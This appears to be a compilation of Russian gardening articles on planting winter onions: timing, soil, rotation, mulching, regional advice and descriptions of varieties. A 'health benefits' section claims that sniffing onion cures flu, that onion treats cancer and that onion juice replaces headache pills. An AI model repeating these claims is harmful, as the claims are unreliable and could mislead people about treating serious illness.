1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Сорта и особенности посадки озимого лука

Озимый лук: посадка и уход. Когда и как сажать озимый лук. Технология выращивания озимого лука

Цель каждого овощевода – это получение хорошего качественного урожая. Любая культура имеет свои характерные особенности выращивания. Сроки посадки и сбора урожая взаимосвязаны. И понятно желание получения продукции в более ранние сроки. Существуют различные способы, позволяющие ускорить созревание овощей. Уменьшить сроки получения репчатого лука может выбор ультраранних сортов и гибридов, а также выращивание рассадой. Озимый лук — относительно новый перспективный способ, не требующий особых затрат, позволяющий получать качественный ранний урожай репки.

Преимущества метода

Выращивать озимый лук, посадка и уход за которым отличаются от традиционного весеннего выращивания, по плечу любому овощеводу, даже начинающему. Этот способ при соблюдении определенных технологических приемов и требований позволяет получить более крупную репку по сравнению с луком весеннего посева, а также увеличить ее урожайность. Растения более устойчивы к основным заболеваниям и менее подвержены стрелкованию. Данный метод способствует получению ранней продукции. Сроки созревания сокращаются на 1-1,5 месяца. Рассадный способ по срокам созревания опережается на 2-3 недели. Отпадает необходимость хранения в зимний период лука севка.

Особенности технологии

Как вырастить озимый лук? Технология выращивания основана на использовании сортов короткого и среднего дня, имеющих хорошие зимостойкие качества. Соотношение светлого и темного времени суток – фактор, влияющий на развитие растений. Данная технология предусматривает стимулирование образования репки при условии короткого дня и относительно низких температур.

Когда сажать озимый лук? Растения должны уйти под зиму с окрепшей листовой частью. Зеленое перо должно иметь не менее семи штук. Для этого определены сроки посева семян и посадки севка.

Осенний период является подготовительным к холодному времени года. Регулярное внесение удобрений в это время позволит накопить почве достаточное количество питательных веществ. Перед наступлением зимы уже должен быть хорошо сформирован озимый лук.

Посадка и уход

Описываемая культура требует соблюдения биологических и технологических требований. При выборе участка следует учесть условия севооборота. Выращивание озимого лука несколько лет подряд на одном месте недопустимо. Лучшими предшественниками будут такие культуры, как зерновые, семейства Крестоцветные, кукуруза, огурец, томат. Не следует сажать лук после таких растений, как петрушка и сельдерей, картофель и бобы.

Важным является качественный состав грунта. Озимый лук размещают на плодородных, обладающих хорошими дренажными качествами, с низкой кислотностью почвах. Перед началом посадки вносят минеральные (азот, фосфор, калий) и органические удобрения (перегной). Не следует использовать свежий навоз. Обязательно удаляют сорную траву.

Оптимальные сроки

Теперь определимся, когда сажать озимый лук. Срокам посадки следует уделить особое внимание. От их соблюдения и правильной технологии зависит будущий урожай. Посевы проводят в период с 15 по 25 августа. Севок высаживают за четыре недели до наступления устойчивых морозов. Растения должны успеть укорениться.

Особенности посева и посадки

Как сажать озимый лук? От правильной посадки зависит, как перезимует растение. При несоблюдении определенных правил, направленных на увеличение зимостойкости культуры, часть растений может вымерзнуть, что приведет к снижению урожая.

Семена озимого лука высевают ленточным четырёхструнным или трехстрочным способом. Расстояние между рядками составляет 35 см. Перед посевом тщательно готовят участок под озимый лук. Посадка и уход в период посевной характеризуется часто неблагоприятными погодными условиями. Обычно на данный период приходятся повышенные температуры и засуха. Поэтому следует использовать только качественный посевной материал, который обрабатывают стимуляторами роста или предварительно замачивают.

Лук севок озимый сажают рядами, расстояние между которыми составляет 40 или 45 см. Глубина посадки луковичек составляет 3-6 см. Между ними выдерживают расстояние 5-6 см. Севок выбирают мелкого размера до 1 см в диаметре. Хорошо переносит холодные зимы и практически не стрелкуется озимый лук. Посадка и уход должны выполняться с соблюдением глубины посева и заделки севка. Укрытие посевов на зиму также стимулирует сохранность растений при низких температурах. Они не должны быть загущенными. Грядки озимого лука мульчируют на зиму. Перед этим их окучивают. В качестве укрывного материала используют солому, а также белое агроволокно.

Весенние мероприятия

После таяния снега снимают мульчирующий материал с участка, где растет озимый лук. Выполняют подкормку. Дальнейший уход заключается в рыхлении междурядий и удалению сорной травы. Производят регулярное увлажнение. Это способствует быстрому развитию растений.

Борьба с вредителями и болезнями

Озимый лук устойчив к болезням. Однако даже небольшое проявление той или иной инфекции в осенний период значительно снижает зимостойкие качества и может привести к подмерзанию растений. К таким заболеваниям относят пероноспороз. Инфекция зимует на пораженных растениях. Против нее в осенний период применяют фунгициды. Ранней весной проводят повторную обработку. Исключением являются растения, предназначенные на зеленое перо. Их весной не обрабатывают. Основной вредитель – луковая муха, но она не наносит существенный урон озимым посевам. При появлении вредителя применяют фунгициды с коротким периодом действия.

Сорта

Какие сорта можно использовать, выращивая озимый лук? Посадка и уход рассчитаны на высадку растений короткого дня. Для этого необходимы специальные сорта, отличные от тех, которые пригодны для ярового выращивания лука. Использование весенних сортов недопустимо, растения будут вымерзать. Большинство таких луковичек с наступлением весеннего тепла выбросит стрелку. Эти посадки можно будет использовать на зеленое перо. При этом выживший посадочный материал не порадует урожаем.

Остановимся на нескольких сортах озимого лука, которые пользуются популярностью у овощеводов. В настоящее время в продаже есть высококачественный семенной материал отечественной и иностранной селекции.

Сорт «Эллан»

Для озимого выращивания хорошими показателями отличаются растения раннеспелые и зимостойкие. Среди отечественных следует отметить сорт «Эллан». Он отличается раннеспелыми сроками созревания. При достаточно хорошей урожайности отличается отличным качеством и достаточно крупной репкой. Вес луковиц достигает 90-100 г. Они округлой и слегка приплюснутой формы, насыщенно желтого цвета. Растения отличаются дружным ростом и быстрым формированием луковицы, высокой устойчивостью к низким температурам и заболеваниям. Посев семян производят в конце августа или начале сентября. Уже в мае или начале июня можно приступать к уборке урожая.

Сорт «Зимовей»

Озимый лук обеспечивает огородников качественным ранним урожаем. Сорт «Зимовей» раннеспелого срока созревания. Отличается высокими темпами роста надземной части и корневой системы. Высокая урожайность сочетается с хорошим качеством луковиц. Они имеют округлую форму и темно-желтый окрас. Средний вес репки составляет 90-120 г. Характеризуется относительной устойчивостью к основным заболеваниям. Слабо повреждается вредителями. Семена высевают в конце августа. Сбор урожая в конце мая или начале июня.

Гибрид «Вольф F1»

Среди сортов зарубежной селекции можно выделить данный гибрид. Он раннеспелый, японского типа. Имеет округлую форму. Луковицы средних размеров достигают 60 или 80 мм в диаметре. Цвет покровных чешуек золотистый. Товарная луковица формируется в конце мая или начале июня. Гибрид устойчив к стрелкованию и обладает хорошими зимостойкими качествами.

Сорт «Штутгартен ризен»

Этот озимый лук высокоурожаен. Он выведен в Германии. Отличается ранними сроками созревания. От отрастания севка до созревания товарной репки достаточно 65-75 дней. Стограммовые луковицы довольно плотные, отличаются отличными лежкими качествами. Форма репки слегка приплюснутая. Поверхностные чешуйки имеют желто-коричневый окрас. Сорт рекомендован для высадки севком за четыре недели перед замерзанием почвы.

Следует также обратить внимание на такие сорта, как «Трой», «Центурион», «Геркулес», «Радар».

Сорта и особенности посадки озимого лука

Репчатый лук традиционно является одним из основных овощей русской кухни. Поэтому его выращивание считается чуть ли не святым делом для любого уважающего себя огородника. В последнее время среди огородников набирает большую популярность посадка лука под зиму, сорта которого отличаются особенной устойчивостью к неблагоприятным условиям. Ведь, несмотря на то, что лук хорошо растёт на наших почвах, всё-таки идеальной культурой его не назовёшь. В зависимости от погодных условий летом и урожайность может подвести, и с зимним хранением бывают проблемы. Неслучайно последние годы всё популярнее становятся сорта озимого лука.

В чём преимущества сортов озимого лука

Особой разницы, может и нет, и даже называются зимние сорта лука подчас так же, как яровые. Принципиальное различие только в одном: они высеваются также, как и другие подзимние культуры, поздно осенью, до наступления больших холодов. Пережив зиму на грядке, озимые сорта лука севка уже с первыми оттепелями оживают и начинают набирать силу.

Какой лук посадить под зиму: плюсы и минусы

Как у любой культуры и ее разновидности, у сортов лука для посадки под зиму есть как свои достоинства, так и недостатки. Мы как всегда будем честными и расскажем вам и об их плюсах, и о минусах.

Хотя, «недостатки» – громко сказано, это слово скорее можно смело заменить на слово «особенности».

Достоинства сортов озимого лука

Если говорить о достоинствах подзимней посадки, то к ним обязательно следует отнести то, что:

  • Сорта озимого лука не требуют длительного хранения, которое доставляет немало хлопот. Особенно, когда после дождливого лета луковки начинают организованно гнить и их приходится без конца перебирать.
  • Уже к маю, если весна окажется достаточно тёплой, можно собирать первые урожаи на еду. И хотя технической спелости озимые сорта лука севка достигают всего на пару недель раньше обычного, но даже в начале огородного сезона луковицы и перо будут крупнее, чем у того же батуна.
  • При грамотной агротехнике зимние сорта лука получаются крупнее обычных. Ведь в условиях естественной среды их рост подчиняется общему природному циклу. С постепенным понижением температуры осенью происходит плавное закаливание посевного материала. А весеннее пробуждение идёт естественным образом вместе с изменениями погоды.

На заметку! В более северных районах России осеннее-весенний сезон чаще всего протекает стрессово из-за изменчивой непредсказуемой погоды. Сев весной доставляет немало неприятных моментов, особенно, когда из-за дождей или медленного таяния снега нет возможности вовремя приступить к посадкам. Сорта озимого лука избавляют огородников от этой проблемы, так как к началу огородных работ уже сидят на грядке.

Об особенностях

Не говорить о рисках было бы неправильно, ведь при любом раскладе они существуют. Впрочем, минусов лучшие сорта озимого лука имеют гораздо меньше.

  • Во-первых, как и со всеми подзимниками, количества семенного материала потребуется больше. Как бы тщательно не перебирались головки при подготовке, всё равно попадаются слабые или поражённые семена, которые неизбежно вымерзнут за зиму.

Поэтому надо быть готовым к тому, что всхожесть зимние сорта лука для посадки дадут хуже…

  • Во-вторых, при хранении они ведут себя капризнее, так что сохранить до осени нужное количество придётся постараться.

Какие сорта озимого лука выбрать

Многие огородники вполне обоснованно задаются вопросом: Какой лук посадить под зиму? Благодаря повышенному интересу в последние годы к зимующим овощам выросло, соответственно, и предложение. Как всегда лидерами на рынке семян являются голландцы, имеющие огромный опыт в высококачественной селекции. Именно озимые сорта лука голландского пользуются наибольшим спросом среди огородников. В топ-7 наиболее популярных зимних сортов лука стоит смело отнести следующие из них.

Радар

Имеет плотную, немного приплюснутую головку, золотисто-жёлтые чешуйки.

  • В среднем луковица весит 150-200 гр., но иногда вырастает до 500 гр.
  • В холодных регионах выдерживает температуры до -25°С.
  • Обладает не только дружной всхожестью, но и отличным вкусом.

Видео: Урожай лука сорт Радар 21.07.2019

Круглый, иногда плоскоокруглый, с жёлто-коричневыми или золотистыми сухими чешуями. Вес, по сравнению с другими сортами, небольшой – 80-100 гр. К преимуществам этого сорта зимнего лука относятся:

  1. морозостойкость;
  2. короткий период созревания (65-70 дней);
  3. и устойчивость к большинству болезней.

Шекспир

Пожалуй, самый популярный сегодня. Озимый лук сорта Шекспир ценится за свои вкусовые качества. А также за скороспелость (не более 75 дн.) и морозостойкость. Благодаря этому он и относится к лучшим сортам лука для посадки под зиму.

Интересно! Плотное прилегание толстых чешуек обеспечивает хорошую зимовку даже в -18 ° С, причем, при отсутствии снежного покрова. Головки круглые, жёлто-коричневые, вес до 100 гр.

Сеншуй

Нравится любителям «остренького».

  • Этот сорт зимнего лука, как никакой другой, надёжен в хранении и устойчив к стрелкованию.
  • Как и большинство озимых культур, является морозостойким.
  • А также, и это несомненный плюс, высокоурожайным.

Круглые луковицы покрыты жёлто-коричневой чешуей.

Стурон

Знакомый по яровому выращиванию, но в специальной селекции используется как озимый сорт. Узнаваемая сильно вытянутая продолговатая форма и золотистый цвет – визитная карточка сорта.

  • Относится к среднеспелым сортам, поспевает только к августу.
  • Зато отличается дружной отдачей урожая и продолжительным хранением.

Видео: Впечатления опытного огородника о луке Стурон

Центурион

Продолговатый лук для посадки под зиму, с золотисто-коричневой оболочкой и острым вкусом, весом до 90-110 гр.

Отличительная черта этого зимнего лука – 100% всхожесть и стабильная урожайность. Поспевает одним из первых, поэтому популярен среди огородников.

Эллан

Этот замечательный сорт озимого лука высаживается в расчете на ранние урожаи, так как зрелости достигает уже в июне. В среднем круглые нежно-золотистые луковицы весят 100-120 гр., имеют особенно приятный сладковато-острый вкус.

Каждый из перечисленных сортов лука для посадки под зиму обладает своими уникальными свойствами. Поэтому трудно сказать, какой из них является лучшим. Многое зависит не только от природной зоны, но и от:

  1. состава почв;
  2. климатических условий;
  3. времени посадки и даже от высоты гряд.

Любой огородник – в душе великий экспериментатор. Поэтому свой идеальный сорт озимого лука стоит найти методом проб и ошибок.

Интересное по теме: Как подготовить грядку под посадку чеснока под зиму

Вступайте в нашу группу ВКонтакте, чтобы всегда быть в курсе о выходе новых публикаций на сайте «4 Сезона огородника». Подписывайтесь и на наш канал в Яндекс Дзен. Там вы найдете 490 статей посвященных теме Сад и огород (подписка абсолютно бесплатная).

Просьба. Кому не в тягость и не лень, поделитесь, пожалуйста, этой заметкой с друзьями в своих социальных сетях. Возможно их этот вопрос тоже весьма интересует.

Всегда ваши, 4 Сезона огородника.

Озимый лук — технология выращивания в открытом грунте, 7 популярных сортов

В последнее время среди садоводов участилась практика посадки лука в зиму. Благодаря чему уже ранней весной можно собрать урожай сочных луковых перьев. А с наступлением лета участок земли, который был использован для выращивания озимого лука, можно засадить другими однолетними овощными культурами. Существует много сортов озимого лука. Самое главное выбрать наиболее хороший вид, который будет соответствовать вашему требованию и климатическим условиям.

Описание сортов озимого репчатого лука

К озимым лукам относят следующие сорта:

Хороший зимний Радар

Данный сорт репчатого лука завоевал популярность благодаря своей неприхотливости в уходе, великолепной зимовке в открытом грунте. Луковицы после созревания достигают больших размеров.

Радар является морозостойким. Минусовая температура, которую способен выдержать этот сорт полностью зависит от толщины снежного покрова на почве. Если толщина снежного слоя довольно высокая, он хорошо себя чувствует до -23 градусов. Если зима не снежная, то способность сохранения луковицы будет удерживаться до -15 градусов.

Такая зависимость от температурного режима присуща всем сортам.

Данный сорт не способен выпускать стрелки. Луковицы очень стойки к всевозможным болезням и нападкам насекомых. Для того чтобы добиться хорошего урожая с огромными луковицами, нужно правильно высадить и ухаживать за ним.

Средняя луковичка достигает в весе до 150 г. И вырастить такой крупный урожай не составит хлопот. В некоторых случаях встречаются плоды, которые весят около 300 г.

Благодаря тому, что чешуя у лука Радар имеет высокую плотность, это способствует длительному хранению.

Шекспир

Этот сорт озимого лука обладает великолепными достоинствами. Основная масса садоводов предпочитает выращивать именно Шекспир.

Он имеет стойкость к морозам выше чем сорт Радар. При полном отсутствии снежного покрова на грунте, он замечательно зимует до -18 градусов и более.

Луковицы данного сорта очень большие, в среднем одна луковица весит 100 г. Форма луковицы круглая, сама мякоть белого цвета и достаточно плотная.

Центурион

Данный сорт также имеет не малую популярность среди озимых сортов лука. Форма луковицы округлая и немного вытянутая. Главным преимуществом этого сорта можно смело отметить долгое хранение. При соблюдении минимальных правил хранения, срок вылеживания достигает 8 месяцев, сохраняя в полной мере свой вкус.

Так же стоит отметить, что Центурион не имеет способности к выгону стрел. Вызревшие луковицы достигают 110-160 г. Также поражает высокая урожайность сорта.

Сеншуй

Не малой популярностью среди сортов озимого лука пользуется Сеншуй. У него не просто хорошая урожайность, но и довольно раннее вызревание. Сама луковица окутана плотными чешуйками.

В основном луковица имеет более круглую форму, но также можно встретить плоские формы. При соблюдении норм хранения данный сорт сохраняет свои свойства и качество до 6 месяцев. Не пускает стрелки.

Отмечена устойчивость лука Сеншуй к заболеваниям и нападкам насекомых.

Штутгартен ризен

Этот сорт лука был выведен селекционерами Германии. Чешуя окрашена в желтый и слегка коричневатый цвет. Но также можно встретить луковицы белого цвета. Форма плода круглая.

Главным преимуществом селекции Штутгартен Ризена считается его огромные размеры. В среднем одна луковица весит 100-150 г, но иногда вес одной единицы достигает 250 г. Имеет долгий срок хранения.

Сорт лука Штутгартен Ризер содержит рекордное количество витамина С.

Струтон

Данный сорт лука имеет превосходный и ярко выраженный вкус, который не спутаешь ни с каким другим сортом. Форма луковицы овальная, укутана в сухие чешуйки. Луковые чешуйки окрашены в золотисто коричневый цвет. Также этот сорт лука отличается своими размерами. Вес одной единицы в среднем будет в районе 180 г.

Обладает высокой устойчивостью к всевозможным болезням и вредителям. При соблюдении норм хранения, Струтон, может вылеживать до 8 месяцев без потери вкуса и качества продукта.

Кип-Велл

Данный сорт лука в последнее время набрал большой популярности среди садоводов. В переводе с английского языка звучит, как «хорошо хранящийся».

Этому сорту не страшны нападки насекомых (луковая муха, луковая нематода) и большинство болезней. Форма луковицы продолговатая и весит в среднем 100-150 г.

Полезные свойства

Озимый лук, также как и обычный, имеет очень много полезных качеств. Его очень часто применяют в народной медицине, как для лечения, так и в качестве профилактики различных заболеваний. Каждый сорт лука содержит свой витаминный состав.

Хочется рассмотреть девять самых полезных качеств лука, который объединяет практически все сорта:

  1. Лук является своего рода природным антибиотиком. Фитонциды, входящие в состав луковицы, помогают в борьбе с ангиной и поддерживают в норме верхние дыхательные пути. Также данное вещество пагубно влияет на огромное количество болезнетворных микроорганизмов. Если порезать луковицу на кусочки и нюхать по нескольку раз в день, можно вылечить или предотвратить заболевание гриппом. Содержащийся в луке витамин С способен повысить уровень иммунной системы, а также избавить человеческий организм от авитаминоза.
  2. Также лук имеет влияние на кроветворение и ее очищение. Является стимулятором пищеварительной системы, способствует выводу из организма избыточной влаги. Широко лук используют при лечении онкологических заболеваний, благодаря кверцитину, содержащемуся в составе лука. Если заменить таблетку вдыханием лукового сока, можно избавиться от головной боли.
  3. Сочные зеленые луковые перья оказывают великолепную заботу о нашей коже. Широкую популярность лук получил в косметологии. При помощи него можно получить очищение лица от ненужных пятен. Ежедневное протирание лица разрезанной луковичкой на двое, избавит от веснушек.
  4. Так же в народной медицине лук известен, как средство снимающее воспаление. Входящий в состав лука флаванол, препятствует онкологическим заболеваниям.
  5. Лук обладает замечательными дезинфицирующими свойствами.
  6. Содержание сахара в луке превышает количество сахара, содержащееся в яблоке и груше. Но тем, кто составляет рацион диетического питания, не стоит отказываться от этого полезного лакомства. Потому, как лук обладает жиросжигающими свойствами. Среди большого количества диет, существует луковая диета, при которой следует ежедневно кушать луковые супы.
  7. Лук способен быстро снять болевые ощущения при укусе осы. Как только ужалила оса, нужно место укуса растирать разрезанной луковицей. Также при помощи лукового сока можно снять боль при заболевании ушей. При помощи компрессов из лука можно избавиться от нарывов, воспалений и помочь заживлению ран. Снимает болезненные ощущения при ревматизме и отеках. В косметологии лук используют для укрепления волосяной луковицы головы и от перхоти.

Размножение

Не все сорта озимого лука могут выбрасывать стрелы с семенами. Поэтому размножение осуществляется двумя видами: с помощью стрел и делением лукового куста в зависимости от сорта:

  1. Вегетативным методом. При делении возле материнской луковицы нарастает много деток, которые впоследствии используют как посадочный материал.
  2. При помощи семян. Когда луковый куст выбрасывает стрелу с соцветием, собираются семена, обрабатываются и используются в качестве посадочного материала. Как вырастить семена лука, описано в этой статье.

Как и множество семян, семена лука дают почти 100% всхожесть при годовалом хранении.

С каждым годом хранения процент всхожести семян снижается. Чтобы проверить качество посадочного материала, нужно высыпать их в емкость с водой. Те семена, которые всплывут, не пригодны к высадке.

Выращивание

Отличие озимого лука от обычного заключается в том, что озимый не требует большого количества света. Но стоит большое внимание уделить агротехнике выращивания:

  1. Правильный подбор сорта для высадки под зиму. Здесь нужно учитывать особенности климата региона.
  2. Почва для озимых сортов – супесчаная или суглинистая. Ни в коем случае почва не должна быть закисленой.
  3. Выбор участка. Если то место, где планируется высадка озимого лука, занято в летнее время другими растениями, его стоит освободить до конца июля.
  4. Постоянный полив. Это нужно, чтобы первые плоды были уже в июне.
  5. Место должно быть достаточно солнечным. В зимнее время нужно подумать о том, чтобы участок с посаженным луком находился постоянно под снегом.

В тех регионах, где снег не задерживается надолго, стоит и укрыть грядки агроволокном.

Посадка лука: как сажать семена, сроки, технология

После извлечения из почвы растений предшественников, землю следует перекопать и внести перегной. После этого нужно дать время около одного месяца на усадку почвы перед посадкой в зиму.

Посев в лесостепных районах производится примерно 10-15 августа, а в степных районах 25-30 августа. Раньше этого времени не стоит производить посадку, так как количество стрелок в весенний период увеличится.

Непосредственно перед высевкой семян в грунт, огород следует полить и после того как земля слегка подсохнет, производится взрыхление и выравнивание участка. Расстояние между рядами лука должно быть 35-40 см. Примерный расход семян на один погонный метр рядка составляет 35-40 жизнеспособных семян. Семена сеются на глубину 1,5-2 см и слегка уплотняется грунт сверху. Если август солнечный и жаркий, следует следить за поливом, не допуская пересыхания почвы.

Первые всходы можно уже увидеть на 18-20 день.

Делаем правильно: уход и посадка озимых сортов осенью

После того как появились всходы, следует регулярно рыхлить почву между рядками и своевременно убирать сорняки. Зачастую осень дождливая, но если дождей не было длительное время, около 20 дней, тогда следует поливать несколько раз. Перед зимовкой стоит проверить всходы на предмет заболевания или поражения вредными насекомыми. Наиболее распространенно осенью заболевание ложной мучнистой росой. Для того чтобы защититься от этого, нужно обработать саженцы фунгицидом, придерживаясь инструкции указанной производителем.

Ложная мучнистая роса — очень распространенное заболевание огурцов. Бороться с ней можно кисломолочной продукцией (кефиром, молоком), силикатом натрия, содовыми и йодированными растворами.

Перед непосредственной зимовкой у растения должно быть больше 4-5 перышек. Во избежание замерзания растения и дальнейшего выталкивания из грунта, перед наступлением зимы нужно окучить кусты на 5-7см.

Широкую популярность в последнее время среди огородников набрало агроволокно белого цвета. Черное предотвращает появление сорняков и удерживает влагу в почве в летний период. А агроволокно белого цвета служит одеялом спасающим саженцы от сильных морозов.

Видео: особенности и агротехника выращивания

Выводы

На первый взгляд может показаться, что процедура выращивания озимого лука (севка) очень сложная, но на самом деле это не так. Главное запомнить основные правила по посадке (как правильно садить, сажать по технологии) и уходу. И уже весной можно будет насладиться первыми порциями витаминов, которыми так богат лук.

Правила обработки лука перед посадкой осенью описаны здесь.

Посадка лука под зиму в 2019: как и когда сажать

Автор: Наталья 06 февраля 2019 Категория: Огородные растения

Лук (лат. Allium) относится к роду двулетних и многолетних растений подсемейства Луковые семейства Амариллисовые. Данное Карлом Линнеем латинское название является производным от названия чеснока: all (лат.) значит «жгучий», хотя есть и другая версия происхождения – от глагола halare (лат.), что означает «пахнуть». В роду луков более 900 видов, произрастающих в природе в степях, лесах и на лугах Северного полушария. Лук введен в культуру более пяти тысяч лет назад, и причиной этому послужили вкусовые и ароматические качества растения. Кроме лука репчатого, наиболее распространенного в культуре, в пищу употребляют также дикие виды: лук странный, песчаный, а также победоносный и медвежий, известные под названием «черемша», скаловый, алтайский, пскемский, угловатый, круглый, огородный, круглоголовый и лук Ошанина.

Из съедобных культурных видов широко культивируются лук-шалот, лук-батун, лук-слизун, лук-порей, лук ветвистый (он же Джусай, дикий, китайский), шнитт-лук и лук сибирский. Кроме того, выведено множество сортов съедобного лука, которые различаются по вкусу, размерам, и времени созревания. Полуострые и сладкие сорта лука культивируют как однолетние растения, а острые сорта – как двухлетние. Посадка чеснока и лука во многом сходны, однако есть различия, о которых нужно знать.

Содержание

Когда сажать лук под зиму

Сроки посадки лука осенью

Давно известно, что лук можно сажать и весной, и осенью, однако почему-то посадка лука в зиму не была до недавнего времени широко распространена. Особенно настороженное отношение вызывала посадка лука на зиму в холодных регионах – в Сибири, на Урале, да и в Подмосковье, а ведь сегодня существует множество сортов озимого лука, которые хорошо зимуют в грунте, зато на следующий год дают ранний урожай. Как посадить лук осенью, когда сажать озимый лук, как защитить его от зимних морозов – на все эти вопросы мы ответим в этой статье.

Когда лук лучше не сажать

Вообще же следует ориентироваться по погоде: лук должен успеть до начала холодов отрастить корни, но нельзя допустить появления ростков. Если посадить лук раньше времени, он пойдет в стрелку и погибнет от морозов, при запоздалой посадке существует риск, что корни не успеют развиться, и сеянец замерзнет в земле. Некоторые садоводы считают, что посадка лука в грунт в конце ноября – оптимальное решение, однако в этом случае результат зависит только от везения.

Посадка озимого лука

После какой культуры сажать лук

Часто не зная, после чего можно сажать лук, огородники допускают ошибки, которые приводят к низким урожаям. Хорошими предшественниками для лука считаются все зерновые, кроме овса, кукуруза, свекла, горчица, рапс, фацелия, горох, фасоль, вика, помидоры, салат, огурцы и любая капуста.

Во избежание заражения лука нематодами не сажайте его после бобов, картофеля, петрушки, сельдерея, люцерны и красного клевера.

Можно выращивать озимый лук вторым урожаем после уборки рапса, озимого ячменя, фасоли, гороха, редиса, моркови и столовой свеклы, если вы успели убрать первый урожай до третьей декады июля. Часто задают вопрос, можно ли сажать лук после лука. На одном месте лук можно выращивать не более двух лет, в следующий раз лук на этом участке, как и на участке, где рос чеснок, можно высаживать не ранее, чем через четыре года.

Лук перед посадкой – подготовка

Посадочный материал лука делится на овсюжку (луковички в диаметре меньше 1см), севок (диаметр луковичек от 1 до 3 см) или лук-выборку – луковички крупнее 3 см. Если вы сажаете лук для зелени, то лучше использовать выборку, поскольку крупная луковичка чаще идет в стрелку, а мелкий севок сажают для получения луковицы-репки. Поэтому рассортируйте посевной материал перед высадкой в грунт, отделяя мелкий севок от более крупной выборки, шейки луковичек не обрезайте.

Севок и овсюжку профессионалы рекомендуют именно к озимой посадке, поскольку они за время зимнего хранения в помещении могут высохнуть, а если их высадить в грунт, то в следующем году они дадут крупные луковицы.

Грунт для лука

Одной из составляющих успешного выращивания озимого лука является правильный выбор участка. Где сажать лук, чтобы создать оптимальные условия для его роста и развития? Почва для лука должна быть легкой – больше всего подходят хорошо дренированные перегнойно-песчаные почвы или перегнойный суглинок на южном или юго-западном склоне, защищенном от ветра высокими растениями. У лука слабая корневая система, поэтому ему нужна плодородная почва. Самый замечательный лук растет на иловых наносах в долинах теплых рек.

Почву перед посадкой нужно заранее перекопать с перегноем (5-6 кг на м²) и минеральными удобрениями из расчета 10-15 г калийной соли и 20-25 г суперфосфата на м². Вместо минеральных удобрений можно внести экофоску из того же расчета. Перед самой посадкой желательно рассыпать по участку золу из расчета 10 г на м².

Посадка лука севком под зиму

Как правильно посадить лук? Выровняйте и уплотните поверхность участка, сделайте в почве бороздки глубиной примерно 5 см на расстоянии около 15-20 см друг от друга. Сухой мелкий севок разложите по бороздкам через 5-7 см, засыпьте сухой землей и слегка ее утрамбуйте. Поливать озимый лук после посадки не нужно – увлажнить участок, если не будет дождей, можно дней через десять.

Когда наступят заморозки, замульчируйте участок с озимым луком сухими листьями, лапником, сосновой хвоей, а сверху прижмите укрытие ветками, чтобы его не размело ветром. Если ожидается холодная и бесснежная зима, можно укрыть участок сверху по мульче пленкой. Снежной зимой пленка вам не понадобится.

Посадка лука-батуна, который выращивается исключительно ради его зелени, ничем не отличается от посадки лука репчатого, а вот у лука-шалота перед посадкой обрезают шейки и потом держат луковички в течение суток в воде с температурой около 30 ºC.

Уход за луком после посадки осенью

Посадка и уход за луком в открытом грунте просты и необременительны. Как только весной начнет прогреваться почва, снимите с озимого лука пленку, а через неделю уберите и мульчу, посыпьте участок золой из расчета 10 г на м², и прорыхлите грунт. Если снять укрытие слишком поздно, лук может под пленкой вымокнуть, а мульча будет задерживать прохождение ростков сквозь толщу земли.

Рыхлить почву желательно после каждого дождя или полива, одновременно освобождая участок от сорняков. Образование у всходов четырех листьев свидетельствует о том, что начала формироваться луковица, а это значит, что пора вносить вторую подкормку, но перед этим проредите лук, если он растет слишком густо. Выдернутые растения можно употребить в пищу. В качестве второй подкормки на 1 м² посадки вносят по 15-20 г суперфосфата и по 10-15 г калийного удобрения, и лучше предварительно растворить гранулы суперфосфата и золу в растворе сброженных трав.

Можно вместо минеральных удобрений внести жидкий куриный помет. Если весна буде влажной, лук поливают нечасто, но если будет стоять жара и сушь, придется устраивать поливы два раза в неделю.

Чтобы ваш урожай не погубила луковая муха, посадите по периметру участка с луком бархатцы или календулу – это гарантированно избавит вас от неприятностей. Созревает озимый лук примерно на месяц раньше посаженного весной.

Особенности посадки озимого лука

Посадка лука под зиму в Подмосковье

Посадка лука в Подмосковье почти ничем не отличается от культивирования в условиях Украины или других теплых регионах. Проблемой может стать лишь слишком холодная зима, но если температура не опустится ниже -15 ºC, а вы укроете лук на зиму, то вымерзание ему не грозит. Если же морозы будут сильнее, но будет много снега, то остается надеяться, что и в этом случае все пройдет благополучно.

Посадка лука под зиму на Урале

Посадка и уход за озимым луком на Урале несколько отличаются от выращивания этой культуры в районах с умеренным климатом. Например, сроки посадки сдвигаются ближе к началу осени – с конца сентября до середины октября. Укрытие на зиму на Урале обязательно, кроме того, далеко не всякий сорт можно сажать под зиму в уральском климате, а только те, что обладают высокой зимостойкостью.

Посадка лука под зиму в Сибири

К сожалению, ядреные сибирские морозы не позволяют с уверенностью говорить о возможности культивирования озимого лука в этом регионе. Если вы угадаете со сроками посадки, с сортом и с зимней погодой, вполне возможно, что ваши усилия увенчаются успехом. Но если вам не повезет, всегда можно посеять лук по весне.

Сорта озимого лука

Предлагаем вам знакомство с некоторыми сортами озимого лука, среди которых вы сможете выбрать те, что подойдут для выращивания в вашей местности.

  • Рубин – сорт донецкой селекции. Скороспелый лук с вегетационным периодом в 72-85 дней с хорошей лежкостью и урожайностью 3 кг/м². Круглая луковица массой 50-80 г светло-фиолетового цвета с серебристым отливом.
  • Сибирский однолетний – скороспелый сорт с вегетационным периодом в 60-70 дней, облиственность сильная, вкус полуострый, луковица округло-плоская желтой окраски. Сорт с хорошей лежкостью и устойчивый к стрелкованию. Урожайность 4 кг/м².
  • Робин – имеет самый сочный красный цвет из всех красных луков. У этого гибрида мощная корневая система, он хорошо переносит засуху, продуктивен. Луковица у него в форме амфоры. Выведен сорт для выращивания в южных регионах.
  • Музона – среднеранний сорт, созревающий из севка через 90-110 дней. Луковицы плотные, круглые, белого цвета, массой – 100-120 г. Хранится лук этого сорта два месяца. Холодостоек.
  • Луганский – позднеспелый сорт с острым вкусом и хорошей лежкостью. Луковица округлая – плосковатая или овальная, покровные чешуи желтые или желто-коричневые, масса луковицы 70-145 г.
  • Буран – сорт украинской селекции универсального назначения с круглой плотной луковицей интенсивно желтого цвета массой до 100 г. Лежкость хорошая, урожайность стабильная, но поражается пероноспорозом.
  • Тамара F1 – среднеранний гибрид с плотными луковицами с желто-коричневой чешуей и полуострым вкусом. Хранится долго, устойчив к фузариозу и розовой гнили, высокоурожаен.
  • Черный принц – среднеспелый сорт российской селекции высокой лежкости с полуострым вкусом и плотными округлыми луковицами темно-фиолетового цвета.
  • Штутгартен ризен – немецкий сорт с плоскими и плоско-круглыми луковицами золотисто-коричневого цвета, острого вкуса. Лежкость хорошая, но поражается шейковой гнилью и мучнистой росой.
